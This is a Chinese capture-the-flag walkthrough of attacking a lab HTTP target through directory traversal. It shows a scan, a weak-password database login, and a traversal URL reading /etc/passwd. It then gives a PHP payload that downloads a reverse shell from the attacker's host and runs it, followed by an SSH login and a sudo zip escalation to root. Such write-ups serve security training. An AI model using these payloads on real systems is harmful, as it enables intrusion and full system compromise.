CTF—攻防练习之HTTP—⽬录遍历
主机:192.168.32.152
靶机:192.168.32.163
⽬录遍历攻击⼜称(⽬录爬升,⽬录回溯,点-点斜线),指再访问存储在web根⽂件之夹外的⽂件和⽬录,通过操控带有"点-斜线(..):序列及变化的⽂件或使⽤绝对⽂件夹路径来引⽤⽂件的变量,可以访问存储在⽂件系统上的任意⽂件和⽬录,包括应⽤程序源代码,配置⽂件信息和关键系统⽂件。
系统访问控制(如在微软windows系统上锁定或使⽤⽂件)限制了对⽂件的访问权限。
nmap,dirb扫描
开放了ssh,http服务还有111端⼝
dbadmin 测下下弱⼝令admin。直接可以登录
⽤扫描器扫,发现存在⽬录遍历⾼位漏洞
php文件下载源码
访问下看看:可以看到etc/passwd⽬录下的⽤户
192.168.32.163/view.php?page=%20../../../../../../../../../../etc/passwd
那么我们就可以上传⼀个shell到数据库,再监听
先将/usr/share/webshells/php 下的 reverse_webshell 复制到桌⾯上,设置ip和监听端⼝,修改名为shell.php
打开数据库管理页⾯,发现如果建⼀个.php名字的数据库,利⽤遍历⽬录漏洞时就可以执⾏php⽂件,达到反弹shell的⽬的
建好库后添加数据表,字段(写⼊
<?php system("cd /tmp; wget 192.168.32.152:8000/shell.php;chmod +x shell.php; php shell.php");?>
成功反弹shell!
pty优化终端,
然后在home⽬录下发现有⼀个⽤户zico, config⽂件中发现了对应的数据库的密码
那就试试ssh登录 ssh zico@192.168.32.162
密码:sWfCsfJSPV9H3AmQzw8
登录成功后sudo -l 发现可以使⽤zip继续提权
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"提权成功!
最终得到root权限

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。